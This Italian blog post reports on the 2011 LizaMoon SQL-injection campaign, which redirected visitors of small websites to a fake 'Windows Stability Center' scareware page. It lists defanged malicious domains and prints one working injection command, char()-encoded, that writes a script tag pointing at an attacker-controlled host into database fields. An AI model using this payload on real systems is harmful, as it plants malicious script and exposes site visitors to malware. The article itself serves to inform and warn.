mercoledì 6 aprile 2011

Lizamoon: attenzione al nuovo attacco malware, milioni di siti infettati


LizaMoon è il nome di un attacco scareware, il cui funzionamento è fondato sul timore di attacchi informatici. Websense Security Labs e il Websense ThreatSeeker Network hanno identificato una nuova campagna dannosa che sfrutta la tecnica SQL injection che gli esperti chiamiamo LizaMoon attack. Ricordiamo che si chiama SQL injection una particolare pratica di attacco che mira a colpire applicazioni web che si appoggiano a DBMS per la memorizzazione e la gestione di dati. L'attacco si concretizza quando l'aggressore riesce ad inviare alla web application, semplicemente usando il browser, una query SQL arbitraria.

L'aggressore, nel caso in cui l'attacco vada a buon fine, può essere in grado di alterare dati memorizzati nel database, aggiungere informazioni maligne nelle pagine web dinamiche generate a partire dal contenuto della base dati, modificare username e password. La campagna LizaMoon è ancora in corso e sono più di 700.000 le pagine che hanno un link script che rimanda lizamoon.com, un sito web noto per la distribuzione di falsi software antivirus, secondo i risultati preliminari della ricerca di Google. In pratica, gli utenti vengono spinti a credere che sul loro computer sia installato un trojan; per liberarsene, vengono invitati ad acquistare e installare un software che si spaccia per un antivirus. Chi abbocca non solo perde il denaro speso per acquistare il falso rimedio ma compromette anche il proprio PC.


Lo script fa riferimento ad un URL contenente il termine "lizamoon" e, come spiega Websense, nonostante la pagina remota sembri non operativa, il server è sempre attivo e funzionante. Basterebbe quindi un semplice intervento, da parte degli aggressori, per tentare la distribuzione di malware e di rogue software. Un'indicazione della dimensione del problema è restituita da Google che segnala centinaia di migliaia di siti Internet contenenti una traccia della medesima infezione. Il nome LizaMoon non è casuale: Websense, che continua ad analizzare e monitore la situazione, ha notato che il codice è comune a tutti i siti colpiti reca proprio la parola LizaMoon. La caratteristica di questo virus è l’attacco di massa verso siti di medie e piccole dimensioni.

I portali dei grandi gruppi vengono ignorati; tutti gli altri sono potenziali vittime. Il virus è stato rintracciato persino su alcune pagine di iTunes: ciò non vuol dire che la piattaforma Apple non è sicura, anzi si sottolinea che tutti i domini della Apple non consentono ad alcun codice di effettuare un'esecuzione, dunque la situazione non è pericolosa in ambiente Apple. La società non ha risposto ad una richiesta di commento. Sfruttando alcune vulnerabilità note di certe web application, come le versioni non aggiornate di diffusi CMS, LizaMoon infetta i siti e redirige i visitatori verso una pagina dove li aspetta uno scareware. L’applicazione è Windows Stability Center e si propone come la soluzione per risolvere i problemi (inesistenti) del computer.


Che cosa accade quando si raggiungono le pagine infette viene spiegato da Patrik Runald, dirigente della ricerca sulla sicurezza di Websense, che alla Reuters ha affermato: "Gli utenti possono accorgersi che sono reindirizzati quando stanno per visitare un indirizzo infettato e possono chiudere immediatamente la finestra per evitare di essere a loro volta infettati. Se gli utenti non chiudono la finestra dell'indirizzo infettato, vengono reindirizzati su una pagina web che mostra loro un messaggio di allarme da parte del Windows Stability Center, che si presenta come fosse un prodotto di sicurezza Microsoft; viene poi detto loro che ci sono problemi con il computer e che devono pagare per mettere a posto il PC".

Ecco un elenco di domini che gli esperti di Websense hanno individuato:
hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php


Websense Labs sono riusciti a trovare ulteriori informazioni sulle stesse SQL Injection. Ecco un esempio di comandi:
+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--


Maggiori informazioni sono disponibili su Stackoverflow.com. Riconoscere la comparsa di LizaMoon è semplice: se ci si ritroverà su un sito compromesso, si aprirà un pop-up che proporrà di scaricare un antivirus, poichè si è riscontrata una situazione di pericolo per il sistema. Accettando, ci si ritroverà invece con un malware. Il cosiddetto attacco "mass-injection", che secondo gli esperti è il più grande del suo genere mai visto, è riuscito a inserire codice maligno in siti web ottenendo l'accesso ai server che eseguono il database, secondo la società di sicurezza che l'ha scoperto. L'attacco ha colpito piccoli siti web, senza alcuna prova che popolari siti istituzionali o di governo siano stati compromessi.

Se gli utenti non chiudono la finestra dopo aver digitato un indirizzo infetto, oppure cliccando un link infetto, vengono reindirizzati ad una pagina che mostra un avviso da 'Windows stability Center' - come se si trattasse d'un prodotto di sicurezza di Microsoft Corp. La presentazione del sito web fasullo, come dimostrato da Websense, è di alta qualità ma chiaramente fraudolento. Microsoft non ha prodotti chiamati 'Windows stability Center'. I consigli per evitare di diventare la prossima vittima di LizaMoon sono sempre gli stessi: navigare prestando attenzione a tutti i messaggi che compaiono a video, utilizzare un antivirus sempre attivo ed aggiornato e soprattutto evitare di fornire dati personali o di scaricare software da siti di dubbia liceità.

Nessun commento:

Posta un commento